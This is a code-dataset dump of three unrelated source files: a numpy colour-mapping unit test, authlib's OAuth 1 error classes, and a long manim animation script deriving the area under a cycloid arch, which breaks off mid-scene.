d69e541de90835415be5516d3e6758b1fcd530d2
|
5973d30947f6bc80b2a50ba260f198bec57ddfc1
|
refs/heads/main
| 2023-09-01T20:41:01.159202
| 2023-08-26T20:45:56
| 2023-08-26T20:45:56
| 44,377,817
| 859
| 134
|
MIT
| 2023-08-26T20:33:59
| 2015-10-16T10:14:20
|
Python
|
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
test_colormap.py
|
import numpy as np
import unittest
from ..colormaps.basic_color_maps import Rainbow, Binary
from ..helpers import map_colors
class TestPythonColorMapping(unittest.TestCase):
# Rainbow: for 0 - blue, for 1 - red
def test_zeros(self):
# given
attribute = np.zeros(5)
# when
colors = map_colors(attribute, Rainbow)
# then
self.assertTrue((colors == np.ones(5, dtype=np.int32) * 0xff).all())
def test_ones(self):
# given
attribute = np.ones(5)
# when
        # an explicit color range is needed here: for a uniform attribute the range is inferred as [1., 2.], which would also map everything to blue
colors = map_colors(attribute, Rainbow, color_range=(0., 1.))
# then
self.assertTrue((colors == np.ones(5, dtype=np.int32) * 0xff0000).all())
def test_gradient(self):
# given
attribute = np.array([0, 0.5, 1])
# when
colors = map_colors(attribute, Binary)
# then
self.assertTrue((colors == [0xffffff, 0x7f7f7f, 0]).all())
if __name__ == '__main__':
unittest.main()
|
fc37cb9fa153acc39f49da82a3f797710d5d2af5
|
a2b3987eb8a50bee311f869e39d1c76e738ba2b8
|
/authlib/oauth1/rfc5849/errors.py
|
93396fcebffc2bfdc9d8456c78e538ef4babc988
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
lepture/authlib
|
abb3e14b8ccacef9ade90b28efed827ab65aadce
|
1846d6ac66e89bdb3268fffe15b7e49289966366
|
refs/heads/master
| 2023-09-04T04:27:56.650738
| 2023-09-02T07:42:47
| 2023-09-02T07:42:47
| 108,510,280
| 4,091
| 481
|
BSD-3-Clause
| 2023-09-13T13:04:38
| 2017-10-27T06:52:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,303
|
py
|
errors.py
|
"""
authlib.oauth1.rfc5849.errors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RFC 5849 does not define error responses. This module is designed by
Authlib based on OAuth 1.0a `Section 10`_ with some changes.
.. _`Section 10`: https://oauth.net/core/1.0a/#rfc.section.10
"""
from authlib.common.errors import AuthlibHTTPError
from authlib.common.security import is_secure_transport
class OAuth1Error(AuthlibHTTPError):
def __init__(self, description=None, uri=None, status_code=None):
super().__init__(None, description, uri, status_code)
def get_headers(self):
"""Get a list of headers."""
return [
('Content-Type', 'application/x-www-form-urlencoded'),
('Cache-Control', 'no-store'),
('Pragma', 'no-cache')
]
class InsecureTransportError(OAuth1Error):
error = 'insecure_transport'
    description = 'OAuth 1 MUST utilize https.'
@classmethod
def check(cls, uri):
if not is_secure_transport(uri):
raise cls()
class InvalidRequestError(OAuth1Error):
error = 'invalid_request'
class UnsupportedParameterError(OAuth1Error):
error = 'unsupported_parameter'
class UnsupportedSignatureMethodError(OAuth1Error):
error = 'unsupported_signature_method'
class MissingRequiredParameterError(OAuth1Error):
error = 'missing_required_parameter'
def __init__(self, key):
description = f'missing "{key}" in parameters'
super().__init__(description=description)
class DuplicatedOAuthProtocolParameterError(OAuth1Error):
error = 'duplicated_oauth_protocol_parameter'
class InvalidClientError(OAuth1Error):
error = 'invalid_client'
status_code = 401
class InvalidTokenError(OAuth1Error):
error = 'invalid_token'
description = 'Invalid or expired "oauth_token" in parameters'
status_code = 401
class InvalidSignatureError(OAuth1Error):
error = 'invalid_signature'
status_code = 401
class InvalidNonceError(OAuth1Error):
error = 'invalid_nonce'
status_code = 401
class AccessDeniedError(OAuth1Error):
error = 'access_denied'
description = 'The resource owner or authorization server denied the request'
class MethodNotAllowedError(OAuth1Error):
error = 'method_not_allowed'
status_code = 405
|
072ed87ca64b1d92b1d7595bab438aa2ef1af2f2
|
6d6bdf36ae14b749fa34fffb3abcd339bc0c135a
|
/my_projects/Cycloid_Area.py
|
34f105bd8c1df64713b9d1e353a5806b66303e15
|
[
"MIT"
] |
permissive
|
cigar666/my_manim_projects
|
201276c3fe4008bc5ff26950bca8280f19c56bbc
|
d693676580dad47b3e64b3f20f7aff9b5ef4f68c
|
refs/heads/master
| 2022-05-06T06:48:00.030028
| 2022-04-22T13:07:21
| 2022-04-22T13:07:21
| 241,033,399
| 204
| 66
|
MIT
| 2020-06-04T09:46:01
| 2020-02-17T06:14:26
|
Python
|
UTF-8
|
Python
| false
| false
| 36,790
|
py
|
Cycloid_Area.py
|
"""
> Author : cigar666
> Created Time : 2020/02/26
> Animation used in : https://www.bilibili.com/video/av92747585
"""
from manimlib.imports import *
from my_manim_projects.my_utils.my_geometry import *
class Cycloid_generation(Scene):
def construct(self):
r = 1.5
circle = Circle(radius=r, color=WHITE, stroke_width=2.5, fill_color=RED, fill_opacity=0)
init_O = DOWN * 0. + LEFT * PI * r + r * UP
ground_line = Line(DOWN * 0. + LEFT * 6, DOWN * 0. + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_O = Dot(init_O, color=YELLOW, plot_depth=1)
dot_P = Dot(init_O + r * DOWN, color=BLUE, plot_depth=1)
line_r = Line(dot_O.get_center(), dot_P.get_center(), stroke_width=2.5)
get_t = lambda : (dot_O.get_center()[0] - init_O[0]) / r
get_P = lambda t: np.array([t - np.sin(t), 1 - np.cos(t), 0]) * r
dot_P.add_updater(lambda d: d.move_to(init_O + r * DOWN + get_P(get_t())))
line_r.add_updater(lambda l: l.become(Line(init_O + r * get_t() * RIGHT, init_O + r * DOWN + get_P(get_t()), stroke_width=2.5)))
circle.add_updater(lambda c: c.move_to(dot_O))
area = Polygon(*[init_O + r * DOWN + get_P(t) for t in np.linspace(0, TAU, 100)], fill_color=BLUE, fill_opacity=0.6)
curve = ParametricFunction(lambda t: init_O + r * DOWN + get_P(t), t_min=0, t_max=TAU, stroke_width=2)
curve.add_updater(lambda c: c.become(ParametricFunction(lambda t: init_O + r * DOWN + get_P(t),
t_min=-0.01, t_max=get_t(), stroke_width=2)))
text = Text('S = ?', font='思源黑体 Bold').scale([1.8, 1.5, 1])
text.set_color_by_t2c({'S': BLUE, '?': PINK})
text.shift(DOWN * 1.5)
self.play(ShowCreation(ground_line))
self.wait(0.5)
self.play(FadeIn(dot_O), run_time=0.7)
self.play(FadeIn(circle), run_time=0.8)
self.wait(0.2)
self.play(ShowCreation(line_r))
self.play(FadeIn(dot_P), run_time=0.7)
self.wait(0.6)
self.add(curve)
self.play(dot_O.shift, 2 * PI * r * RIGHT, rate_func=linear, run_time=4)
self.wait()
self.play(FadeIn(area), run_time=1.2)
self.wait(0.4)
self.play(TransformFromCopy(area, text), run_time=1.5)
self.wait(0.5)
# self.play(ShowCreationThenFadeAround(SurroundingRectangle(text)), run_time=1.25)
self.play(WiggleOutThenIn(text), run_time=1.2)
self.wait(5)
class Area_divide_into_tri(Scene):
def construct(self):
r = 1.5
n = 6
points_6 = [complex_to_R3(r * np.exp(1j * TAU/n * i)) for i in range(n)]
poly_6 = Polygon(*points_6, stroke_width=3)
poly_6.shift(r * 3 * LEFT + UP * 2)
ground_line = Line(DOWN * r * np.sqrt(3)/2 + UP * 2 + LEFT * 6, DOWN * r * np.sqrt(3)/2 + UP * 2 + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_pink = Dot(poly_6.get_center() + complex_to_R3(r * np.exp(1j * (-2) * TAU/n)), color=PINK, plot_depth=1)
start_point = dot_pink.get_center()
poly = VGroup(poly_6, dot_pink)
self.add(ground_line)
self.play(ShowCreation(poly_6))
self.play(FadeInFromLarge(dot_pink))
self.wait()
line_points = []
p_old = dot_pink.get_center()
line_group = VGroup()
for i in range(n):
self.add(poly.copy().set_stroke(opacity=0.4))
self.play(Rotating(poly, radians=-TAU/n, about_point=poly_6.get_center() + complex_to_R3(r * np.exp(1j * (-1) * TAU/n)), run_time=1.2)) #
line_group.add(Line(p_old, dot_pink.get_center(), stroke_width=2.5))
self.play(ShowCreation(line_group[-1]), run_time=0.5)
p_old = dot_pink.get_center()
self.play(FadeIn(poly.copy().set_stroke(opacity=0.25)), run_time=0.25)
self.wait(0.5)
c1, c2, c3, c4 = RED, BLUE, YELLOW, GREEN
# r0 = 0.01
tri_1_01 = Polygon(start_point + r * RIGHT, start_point + 2 * r * RIGHT,
start_point + r/2 * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_1_02 = Polygon(start_point + 2 * r * RIGHT, start_point + 3 * r * RIGHT,
start_point + 2 * r * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_1_03 = Polygon(start_point + 3 * r * RIGHT, start_point + 4 * r * RIGHT,
start_point + 4 * r * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_1_04 = Polygon(start_point + 4 * r * RIGHT, start_point + 5 * r * RIGHT,
start_point + 5.5 * r * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_2_01 = Polygon(start_point + 0 * RIGHT, start_point + 1 * r * RIGHT,
start_point - r/2 * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8)#.round_corners(r0)
tri_2_02 = Polygon(start_point + 0.5 * r * RIGHT + np.sqrt(3)/2 * r * UP,
start_point + 2 * r * RIGHT, start_point + r * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8)#.round_corners(r0)
tri_2_03 = tri_2_02.copy().flip(about_point=0.5 * r * LEFT)
tri_2_04 = tri_2_01.copy().flip(about_point=0.5 * r * LEFT)
tri_3_01 = Polygon(start_point + 2 * r * RIGHT, start_point + 1.5 * r * RIGHT + np.sqrt(3)/2 * r * UP,
start_point + r * 2 * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8)#.round_corners(r0)
tri_3_02 = Polygon(start_point + 2 * r * RIGHT + np.sqrt(3) * r * UP,
start_point + 3 * r * RIGHT + np.sqrt(3) * r * UP, start_point + 3 * r * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8)#.round_corners(r0)
tri_3_03 = tri_3_02.copy().flip(about_point=0.5 * r * LEFT)
tri_3_04 = tri_3_01.copy().flip(about_point=0.5 * r * LEFT)
tri_4_01 = Polygon(start_point, start_point + 1 * r * RIGHT,
start_point + r * 0.5 * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c4, fill_opacity=0.8)#.round_corners(r0)
tri_4_02 = Polygon(start_point + r * 0.5 * RIGHT + r * np.sqrt(3)/2 * UP,
start_point + 2 * r * RIGHT + np.sqrt(3) * r * UP, start_point + 2 * r * RIGHT,
color=WHITE, stroke_width=2., fill_color=c4, fill_opacity=0.8)#.round_corners(r0)
tri_4_03 = tri_4_02.copy().flip(about_point=0.5 * r * LEFT)
tri_4_04 = tri_4_01.copy().flip(about_point=0.5 * r * LEFT)
tri_group_01, tri_group_02, tri_group_03, tri_group_04 = VGroup(tri_1_01, tri_1_02, tri_1_03, tri_1_04),\
VGroup(tri_2_01, tri_2_02, tri_2_03, tri_2_04),\
VGroup(tri_3_01, tri_3_02, tri_3_03, tri_3_04),\
VGroup(tri_4_01, tri_4_02, tri_4_03, tri_4_04)
self.play(FadeIn(tri_group_01), FadeIn(tri_group_04), FadeIn(tri_group_03[1:3]))
self.wait()
self.play(ReplacementTransform(tri_group_04[0], tri_group_02[0]), run_time=1.25)
self.wait(0.25)
self.play(ReplacementTransform(tri_group_04[1], VGroup(tri_group_02[1], tri_group_03[0])), run_time=1.25)
self.wait(0.25)
self.play(ReplacementTransform(tri_group_04[2], VGroup(tri_group_02[2], tri_group_03[-1])), run_time=1.25)
self.wait(0.25)
self.play(ReplacementTransform(tri_group_04[3], tri_group_02[3]), run_time=1.25)
self.wait(1.25)
## rearrange triangles ##
p_6 = [complex_to_R3(r * np.exp(1j * (TAU/n * i + PI/2))) for i in range(n)]
t_01 = Polygon(p_6[0], p_6[1], p_6[2],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
t_02 = Polygon(p_6[0], p_6[2], p_6[3],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
t_03 = Polygon(p_6[0], p_6[3], p_6[4],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
t_04 = Polygon(p_6[0], p_6[4], p_6[5],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
poly_by_tri_01 = VGroup(t_01, t_02, t_03, t_04)
poly_by_tri_02 = poly_by_tri_01.copy().set_fill(color=c2).shift(DOWN * r)
poly_by_tri_03 = poly_by_tri_01.copy().set_fill(color=c3).shift(DOWN * r + RIGHT * r * 2.5)
poly_by_tri_01.shift(DOWN * r + LEFT * r * 2.5)
self.play(TransformFromCopy(tri_group_01, poly_by_tri_01), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_02, poly_by_tri_02), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_03, poly_by_tri_03), run_time=2.25)
self.wait(4)
class Area_divide_into_tri_02(Scene):
def construct(self):
r = 1.5
n = 8
points_8 = [complex_to_R3(r * np.exp(1j * (TAU/n * i + PI/n))) for i in range(n)]
poly_8 = Polygon(*points_8, stroke_width=3)
poly_8.shift(r * 3 * LEFT + UP * 2)
ground_line = Line(DOWN * r * np.cos(PI/n) + UP * 2 + LEFT * 6, DOWN * r * np.cos(PI/n) + UP * 2 + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_pink = Dot(poly_8.get_center() + complex_to_R3(r * np.exp(1j * ((-3) * TAU/n + PI/n))), color=PINK, plot_depth=1)
start_point = dot_pink.get_center()
poly = VGroup(poly_8, dot_pink)
self.add(ground_line)
self.wait()
self.play(ShowCreation(poly_8))
self.play(FadeInFromLarge(dot_pink), run_time=0.75)
self.wait()
line_points = []
p_old = dot_pink.get_center()
line_group = VGroup()
for i in range(n):
self.add(poly.copy().set_stroke(opacity=0.4))
self.play(Rotating(poly, radians=-TAU/n, about_point=poly_8.get_center() + complex_to_R3(r * np.exp(1j * ((-2) * TAU/n + PI/n))), run_time=0.8)) #
line_group.add(Line(p_old, dot_pink.get_center(), stroke_width=2.5))
self.play(ShowCreation(line_group[-1]), run_time=0.4)
p_old = dot_pink.get_center()
# self.play(FadeIn(poly.copy().set_stroke(opacity=0.25)), run_time=0.25)
self.wait(2.)
r = 1.5
n = 10
points_10 = [complex_to_R3(r * np.exp(1j * TAU/n * i)) for i in range(n)]
poly_10 = Polygon(*points_10, stroke_width=3)
poly_10.shift(r * 3 * LEFT + DOWN * 2)
ground_line = Line(DOWN * r * np.cos(PI/n) + DOWN * 2 + LEFT * 6, DOWN * r * np.cos(PI/n) + DOWN * 2 + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_pink = Dot(poly_10.get_center() + complex_to_R3(r * np.exp(1j * (-3) * TAU/n)), color=PINK, plot_depth=1)
start_point = dot_pink.get_center()
poly = VGroup(poly_10, dot_pink)
self.play(ShowCreation(ground_line))
self.wait()
self.play(ShowCreation(poly_10))
self.play(FadeInFromLarge(dot_pink))
self.wait()
line_points = []
p_old = dot_pink.get_center()
line_group = VGroup()
for i in range(n):
self.add(poly.copy().set_stroke(opacity=0.4))
self.play(Rotating(poly, radians=-TAU/n, about_point=poly_10.get_center() + complex_to_R3(r * np.exp(1j * (-2) * TAU/n)), run_time=0.72)) #
line_group.add(Line(p_old, dot_pink.get_center(), stroke_width=2.5))
self.play(ShowCreation(line_group[-1]), run_time=0.36)
p_old = dot_pink.get_center()
self.wait(2)
self.play(VGroup(*self.mobjects).shift, UP * 4, run_time=1.8)
self.wait()
start_point += 4 * UP
c1, c2, c3, c4 = RED, BLUE, YELLOW, GREEN
# r0 = 0.0001
tri_group_01 = VGroup()
l = r * np.sin(PI/n) * 2
for i in range(1, 5):
tri_group_01.add(Polygon(start_point + l * i * RIGHT, start_point + l * (i+1) * RIGHT, line_group[i-1].get_end(),
color=WHITE, stroke_width=2.5, fill_color=c1, fill_opacity=0.8))
for i in range(5, 9):
tri_group_01.add(Polygon(start_point + l * i * RIGHT, start_point + l * (i+1) * RIGHT, line_group[i-1].get_end(),
color=WHITE, stroke_width=2.5, fill_color=c1, fill_opacity=0.8))
tri_group_02 = VGroup()
for i in range(0, 4):
tri_group_02.add(Polygon(line_group[i].get_start(), start_point + l * (i+1) * RIGHT,
line_group[i].get_end() + l * LEFT,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8))
for i in range(0, 4):
tri_group_02.add(Polygon(line_group[3-i].get_start(), start_point + l * (3-i+1) * RIGHT,
line_group[3-i].get_end() + l * LEFT,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8).flip(about_point=start_point + l * 5))
tri_group_03 = VGroup()
for i in range(1, 4):
tri_group_03.add(Polygon(line_group[i].get_end(), start_point + l * (i+1) * RIGHT,
line_group[i-1].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8))
tri_group_03.add(Polygon(line_group[3].get_end(), start_point + l * 5 * RIGHT,
line_group[3].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8))
tri_group_03.add(Polygon(line_group[3].get_end(), start_point + l * 5 * RIGHT,
line_group[3].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8).flip(about_point=start_point + l * 5))
for i in range(1, 4):
tri_group_03.add(Polygon(line_group[4-i].get_end(), start_point + l * (4-i+1) * RIGHT,
line_group[4-i-1].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8).flip(about_point=start_point + l * 5))
tri_group_04 = VGroup()
for i in range(9):
tri_group_04.add(Polygon(line_group[i].get_start(), start_point + l * (i+1) * RIGHT, line_group[i].get_end(),
color=WHITE, stroke_width=2., fill_color=c4, fill_opacity=0.8))
self.play(FadeIn(tri_group_01))
self.wait()
self.play(FadeIn(tri_group_04))
self.wait()
self.play(ReplacementTransform(tri_group_04[0], tri_group_02[0]), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[1], VGroup(tri_group_02[1], tri_group_03[0])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[2], VGroup(tri_group_02[2], tri_group_03[1])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[3], VGroup(tri_group_02[3], tri_group_03[2])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[4], tri_group_03[3:5]), run_time=1.2)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[5], VGroup(tri_group_02[4], tri_group_03[5])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[6], VGroup(tri_group_02[5], tri_group_03[6])), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(tri_group_04[7], VGroup(tri_group_02[6], tri_group_03[7])), run_time=0.8)
self.wait(0.24)
self.play(ReplacementTransform(tri_group_04[8], tri_group_02[-1]), run_time=0.8)
self.wait()
## rearrange triangles ##
p_10 = [complex_to_R3(r * np.exp(1j * (TAU/n * i + PI/2))) for i in range(n)]
poly_by_tri_01 = VGroup()
for i in range(n-2):
tri_i = Polygon(p_10[0], p_10[i+1], p_10[i+2],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)
poly_by_tri_01.add(tri_i)
poly_by_tri_02 = poly_by_tri_01.copy().set_fill(color=c2).shift(DOWN * r)
poly_by_tri_03 = poly_by_tri_01.copy().set_fill(color=c3).shift(DOWN * r + RIGHT * r * 2.5)
poly_by_tri_01.shift(DOWN * r + LEFT * r * 2.5)
self.play(TransformFromCopy(tri_group_01, poly_by_tri_01), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_02, poly_by_tri_02), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_03, poly_by_tri_03), run_time=2.25)
self.wait(4)
class Area_by_integral(Scene):
def construct(self):
text_x = TexMobject('x=r(t-\\sin{t})', color=BLUE).to_corner(LEFT * 2 + UP * 1.5)
text_y = TexMobject('y=r(1-\\cos{t})', color=BLUE).to_corner(LEFT * 2 + UP * 3)
text_t = TexMobject('0\\leqslant t \\leqslant 2\\pi', color=BLUE).to_corner(LEFT * 1.5 + UP * 4.5).scale(0.75)
text_01 = TexMobject('A=\\int^{x=2\\pi r}_{x=0} y dx').to_corner(LEFT * 2 + UP * 7.5)
text_02 = TexMobject('=\\int^{t=2\\pi}_{t=0} r^2(1-\\cos{t})^2 dt').next_to(text_01, RIGHT * 0.5)
text_03 = TexMobject('=r^2({3\\over2}t-2\\sin{t}+{1\\over2}\\cos{t}\\sin{t})', '\\Big|', '^{t=2\\pi}', '_{t=0}').next_to(text_01, DOWN * 1.2).to_corner(LEFT * 2)
# text_03[1].scale([1,2,1]), text_03[2].align_to(text_03[1], UP), text_03[3].align_to(text_03[1], DOWN)
text_04 = TexMobject('=3\\pi r^2').scale(1.1).next_to(text_03, RIGHT * 0.5)
self.play(Write(text_x), run_time=1.2)
self.play(Write(text_y), run_time=1.2)
self.play(Write(text_t), run_time=1.2)
self.wait()
self.play(Write(text_01), run_time=1.5)
self.wait(0.5)
self.play(Write(text_02), run_time=1.8)
self.wait(0.5)
self.play(Write(text_03), run_time=2)
self.wait(0.5)
self.play(Write(text_04), run_time=1.25)
self.wait(5)
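# A quick numerical cross-check of the integral derived above (a standalone
# sketch, not one of the scenes; it only runs when this file is executed
# directly and relies on numpy, which is already imported here as np).
if __name__ == "__main__":
    _t = np.linspace(0, 2 * np.pi, 200_001)
    _r = 1.0
    _y = _r * (1 - np.cos(_t))         # y(t) = r(1 - cos t)
    _dx_dt = _r * (1 - np.cos(_t))     # dx/dt = r(1 - cos t)
    _area = np.trapz(_y * _dx_dt, _t)  # A = ∫ y (dx/dt) dt over one arch
    assert abs(_area - 3 * np.pi * _r ** 2) < 1e-6  # A = 3πr²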
class Area_divide_into_rect(Scene):
def construct(self):
r = 1.5
start_point = UP * 0.5 + PI * r * LEFT
curve = ParametricFunction(lambda t: start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]),
t_min=0, t_max=PI * 2, stroke_width=2)
ground_line = Line(UP * 0.5 + LEFT * 6, UP * 0.5 + RIGHT * 6, color=WHITE, stroke_width=2.5)
circle = Circle(radius=r, color=WHITE, stroke_width=2., fill_color=RED, fill_opacity=0.0).move_to((r + 0.5) * UP)
# left part of the area
area_l = Polygon(*([start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]) for t in np.linspace(0, PI, 50)] +
[start_point + r * UP + r * PI * RIGHT + r * np.array([np.cos(t), np.sin(t), 0]) for t in np.linspace(PI/2, 3*PI/2, 50)]),
stroke_width=2, fill_color=BLUE, fill_opacity=0.0)
# right part of the area
area_r = Polygon(*([start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]) for t in np.linspace(2 * PI, PI, 50)] +
[start_point + r * UP + r * PI * RIGHT + r * np.array([np.cos(t), np.sin(t), 0]) for t in np.linspace(PI/2, -PI/2, 50)]),
stroke_width=2, fill_color=YELLOW, fill_opacity=0.0)
s_l, s_m, s_r = area_l.copy().set_fill(opacity=0.8), circle.copy().set_fill(opacity=0.8), area_r.copy().set_fill(opacity=0.8)
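# The TeX subscripts below are rendered in Chinese: 蓝 = blue, 红 = red, 黄 = yellow.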
formula = TexMobject('S', '=', 'S_{\\text{蓝}}', '+', 'S_{\\text{红}}', '+', 'S_{\\text{黄}}').scale(1.6)
formula[0].set_color(PINK), formula[2].set_color(BLUE), formula[4].set_color(RED), formula[6].set_color(YELLOW)
formula.to_corner(LEFT * 2.5 + UP * 8.5)
rects_7 = self.create_rects(num=7, start_point=start_point, r=1.5)
rects_17 = self.create_rects(num=17, start_point=start_point, r=1.5, stroke_width=0.4)
rects_37 = self.create_rects(num=37, start_point=start_point, r=1.5, stroke_width=0.1)
rects_81 = self.create_rects(num=81, start_point=start_point, r=1.5, stroke_width=0.0).scale([1,1.001,1])
rects_y_7 = rects_7.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_17 = rects_17.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_37 = rects_37.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_81 = rects_81.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
self.add(curve, ground_line)
self.wait(0.8)
self.play(FadeIn(s_l))
self.play(FadeIn(s_m))
self.play(FadeIn(s_r))
self.add(area_l, circle, area_r)
self.wait(0.9)
self.play(Write(formula[0:2]))
self.wait(0.4)
self.play(ReplacementTransform(s_l, formula[2]))
self.play(Write(formula[3]), run_time=0.4)
self.wait(0.25)
self.play(ReplacementTransform(s_m, formula[4]))
self.play(Write(formula[5]), run_time=0.4)
self.wait(0.25)
self.play(ReplacementTransform(s_r, formula[6]))
self.wait(0.8)
self.play(Rotating(area_r, radians=PI, axis=RIGHT, run_time=1.6))
self.wait()
for rect, rect_y in zip(rects_7, rects_y_7): self.play(FadeInFromUp(rect), FadeInFromDown(rect_y), run_time=0.8)
self.wait(0.2)
self.play(ReplacementTransform(rects_7, rects_17), ReplacementTransform(rects_y_7, rects_y_17), run_time=1.5)
self.wait(0.2)
self.play(ReplacementTransform(rects_17, rects_37), ReplacementTransform(rects_y_17, rects_y_37), run_time=1.25)
self.wait(0.2)
self.play(ReplacementTransform(rects_37, rects_81), ReplacementTransform(rects_y_37, rects_y_81), run_time=1.2)
self.wait()
rects_7_new = self.create_rects(num=7, start_point=start_point, r=1.5)
rects_17_new = self.create_rects(num=17, start_point=start_point, r=1.5, stroke_width=0.4)
rects_37_new = self.create_rects(num=37, start_point=start_point, r=1.5, stroke_width=0.1)
rects_81_new = self.create_rects(num=81, start_point=start_point, r=1.5, stroke_width=0.0).scale([1, 1.001, 1])
rects_y_7_new = rects_7_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_17_new = rects_17_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_37_new = rects_37_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
rects_y_81_new = rects_81_new.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
area_b = Polygon(*([(np.array([PI * r - r * t, r * (1 - np.cos(t)), 0]) + start_point) for t in np.linspace(0, PI, 100)] + [start_point]),
stroke_width=0.1, stroke_color=BLACK, fill_color=BLUE, fill_opacity=0.8)
area_y = area_b.copy().set_fill(color=YELLOW).rotate(PI, about_point=start_point + r * UP + PI * r * RIGHT)
self.play(FadeOut(formula))
start_new = start_point + DOWN * 3.5
ground_line_new = ground_line.copy().shift(DOWN * 3.5)
curve_new = curve.copy().shift(DOWN * 3.5)
init_O = start_new + r * UP
circle_init = circle.copy().move_to(init_O)
circle_new = circle.copy().move_to(init_O)
circle_mid = circle.copy().move_to(init_O + r * PI * RIGHT)
dot_O_init = Dot(init_O, color=YELLOW, plot_depth=1)
dot_O = Dot(init_O, color=YELLOW, plot_depth=1)
dot_O_2 = Dot(init_O + r * PI * RIGHT, color=YELLOW, plot_depth=1)
dot_P_init = Dot(init_O + r * DOWN, color=BLUE, plot_depth=1)
dot_P = Dot(init_O + r * DOWN, color=BLUE, plot_depth=1)
dot_P_2 = Dot(init_O + r * DOWN + r * PI * RIGHT, color=BLUE, plot_depth=1)
line_r_init = Line(dot_O.get_center(), dot_P.get_center(), stroke_width=2.5)
line_r = Line(dot_O.get_center(), dot_P.get_center(), stroke_width=2.5)
line_r_2 = Line(dot_O_2.get_center(), dot_P_2.get_center(), stroke_width=2.5)
line_PP2 = Line(dot_P.get_center(), dot_P_2.get_center(), stroke_width=2.5, color=BLUE)
line_PP_init = DashedLine(dot_P.get_center(), dot_P_init.get_center(), stroke_width=2.5, color=BLUE)
get_t = lambda : (dot_O.get_center()[0] - init_O[0]) / r
get_P = lambda t: np.array([t - np.sin(t), 1 - np.cos(t), 0]) * r
get_P2 = lambda t: np.array([PI - np.sin(t), 1 - np.cos(t), 0]) * r
get_P_init = lambda t: np.array([- np.sin(t), 1 - np.cos(t), 0]) * r
dot_P_init.add_updater(lambda d: d.move_to(start_new + get_P_init(get_t())))
dot_P.add_updater(lambda d: d.move_to(start_new + get_P(get_t())))
dot_P_2.add_updater(lambda d: d.move_to(start_new + get_P2(get_t())))
line_r_init.add_updater(lambda l: l.become(Line(init_O, start_new + get_P_init(get_t()), stroke_width=2.5)))
line_r.add_updater(lambda l: l.become(Line(init_O + r * get_t() * RIGHT, start_new + get_P(get_t()), stroke_width=2.5)))
line_r_2.add_updater(lambda l: l.become(Line(init_O + r * PI * RIGHT, start_new + get_P2(get_t()), stroke_width=2.5)))
line_PP2.add_updater(lambda l: l.become(Line(start_new + get_P(get_t()), start_new + get_P2(get_t()), stroke_width=2.5, color=BLUE)))
